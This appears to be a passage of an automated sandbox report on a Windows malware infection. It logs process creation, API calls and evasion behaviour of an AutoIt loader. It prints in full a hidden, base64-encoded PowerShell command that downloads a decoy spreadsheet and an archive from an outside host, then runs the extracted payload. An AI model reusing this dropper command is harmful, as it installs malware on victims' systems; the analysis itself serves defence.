Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A4E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00A4E387
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A5A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00A5A0FA
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A5A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_00A5A488
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A565F1 FindFirstFileW,FindNextFileW,FindClose,	5_2_00A565F1
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A1C642 FindFirstFileExW,	5_2_00A1C642
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A572E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00A572E9
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A57248 FindFirstFileW,FindClose,	5_2_00A57248
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A4D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00A4D836
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A4DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00A4DB69
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A59F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00A59F9F

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_009E5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_009E5D78

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000

Source: powershell.exe, 00000002.00000002.1380730987.000001B7202A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000003.00000002.2449198578.000001E405C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2445433976.000001E40062B000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000002.1331205766.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1323281628.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1311910682.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000002.1331335466.00000000016E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1380730987.000001B7202A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A5F3FF BlockInput,

5_2_00A5F3FF

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_009E3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_009E3312

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_009E5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_009E5D78

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A05078 mov eax, dword ptr fs:[00000030h]

5_2_00A05078

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A42093 GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,

5_2_00A42093

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A129B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00A129B2
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A00BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00A00BCF
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A00D65 SetUnhandledExceptionFilter,	5_2_00A00D65
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A00FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00A00FB1

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\cmd.exe

Section loaded: NULL target: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe protection: readonly

Source: C:\Users\user\AppData\Local\Temp\a.exe

5_2_00A41A91

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_009E3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_009E3312

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A4BB02 SendInput,keybd_event,

5_2_00A4BB02

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A4EBB3 mouse_event,

5_2_00A4EBB3

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) \| Invoke-Expression"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Documents\MixDep2025.xlsx"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe "C:\Users\user\AppData\Local\Temp\a.exe" C:\Users\user\AppData\Local\Temp\\P.a3x	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Expand-Archive -Path C:\ProgramData\py.zip -DestinationPath C:\ProgramData\PyPackages -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe python.exe logo.png

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -windowstyle hidden -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jhrlbxa9w1n5c3rlbs5jty5qyxroxto6r2v0vgvtcfbhdggoktskzg9jdw1lbnrzpvttexn0zw0urw52axjvbm1lbnrdojphzxrgb2xkzxjqyxrokcdneurvy3vtzw50cycpo0ludm9rzs1xzwjszxf1zxn0ic1vcmkgj2h0dhbzoi8vc2hhcmvmawxlc29ubgluzs5uzxqvtwl4rgvwmjayns54bhn4jyatt3v0rmlszsaijgrvy3vtzw50c1xnaxhezxaymdi1lnhsc3gio1n0yxj0lvbyb2nlc3mgluzpbgvqyxroicikzg9jdw1lbnrzxe1peerlcdiwmjuuegxzeci7sw52b2tllvdlyljlcxvlc3qglvvyasanahr0chm6ly9zagfyzwzpbgvzb25saw5llm5ldc9lcncuemlwjyatt3v0rmlszsaijhrlbxbczxj3lnppcci7qwrklvr5cguglufzc2vtymx5tmftzsbtexn0zw0usu8uq29tchjlc3npb24urmlszvn5c3rlbttbu3lzdgvtlklplknvbxbyzxnzaw9ullppcezpbgvdojpfehryywn0vg9eaxjly3rvcnkoiir0zw1wxgvydy56axailcakdgvtcck7u3rhcnqtuhjvy2vzcyatrmlszvbhdgggiir0zw1wxgeuzxhliiatqxjndw1lbnrmaxn0icikdgvtcfxqlmezeciglu5vtmv3v2luzg93ic1xywl0dqojiejsqujvuw0k')) \| invoke-expression"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jhrlbxa9w1n5c3rlbs5jty5qyxroxto6r2v0vgvtcfbhdggoktskzg9jdw1lbnrzpvttexn0zw0urw52axjvbm1lbnrdojphzxrgb2xkzxjqyxrokcdneurvy3vtzw50cycpo0ludm9rzs1xzwjszxf1zxn0ic1vcmkgj2h0dhbzoi8vc2hhcmvmawxlc29ubgluzs5uzxqvtwl4rgvwmjayns54bhn4jyatt3v0rmlszsaijgrvy3vtzw50c1xnaxhezxaymdi1lnhsc3gio1n0yxj0lvbyb2nlc3mgluzpbgvqyxroicikzg9jdw1lbnrzxe1peerlcdiwmjuuegxzeci7sw52b2tllvdlyljlcxvlc3qglvvyasanahr0chm6ly9zagfyzwzpbgvzb25saw5llm5ldc9lcncuemlwjyatt3v0rmlszsaijhrlbxbczxj3lnppcci7qwrklvr5cguglufzc2vtymx5tmftzsbtexn0zw0usu8uq29tchjlc3npb24urmlszvn5c3rlbttbu3lzdgvtlklplknvbxbyzxnzaw9ullppcezpbgvdojpfehryywn0vg9eaxjly3rvcnkoiir0zw1wxgvydy56axailcakdgvtcck7u3rhcnqtuhjvy2vzcyatrmlszvbhdgggiir0zw1wxgeuzxhliiatqxjndw1lbnrmaxn0icikdgvtcfxqlmezeciglu5vtmv3v2luzg93ic1xywl0dqojiejsqujvuw0k')) \| invoke-expression"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jhrlbxa9w1n5c3rlbs5jty5qyxroxto6r2v0vgvtcfbhdggoktskzg9jdw1lbnrzpvttexn0zw0urw52axjvbm1lbnrdojphzxrgb2xkzxjqyxrokcdneurvy3vtzw50cycpo0ludm9rzs1xzwjszxf1zxn0ic1vcmkgj2h0dhbzoi8vc2hhcmvmawxlc29ubgluzs5uzxqvtwl4rgvwmjayns54bhn4jyatt3v0rmlszsaijgrvy3vtzw50c1xnaxhezxaymdi1lnhsc3gio1n0yxj0lvbyb2nlc3mgluzpbgvqyxroicikzg9jdw1lbnrzxe1peerlcdiwmjuuegxzeci7sw52b2tllvdlyljlcxvlc3qglvvyasanahr0chm6ly9zagfyzwzpbgvzb25saw5llm5ldc9lcncuemlwjyatt3v0rmlszsaijhrlbxbczxj3lnppcci7qwrklvr5cguglufzc2vtymx5tmftzsbtexn0zw0usu8uq29tchjlc3npb24urmlszvn5c3rlbttbu3lzdgvtlklplknvbxbyzxnzaw9ullppcezpbgvdojpfehryywn0vg9eaxjly3rvcnkoiir0zw1wxgvydy56axailcakdgvtcck7u3rhcnqtuhjvy2vzcyatrmlszvbhdgggiir0zw1wxgeuzxhliiatqxjndw1lbnrmaxn0icikdgvtcfxqlmezeciglu5vtmv3v2luzg93ic1xywl0dqojiejsqujvuw0k')) \| invoke-expression"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A413F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

5_2_00A413F2

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A41EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

5_2_00A41EF3

Source: a.exe, 00000005.00000000.1236807206.0000000000AA3000.00000002.00000001.01000000.00000008.sdmp, a.exe.2.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: a.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A00A28 cpuid

5_2_00A00A28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
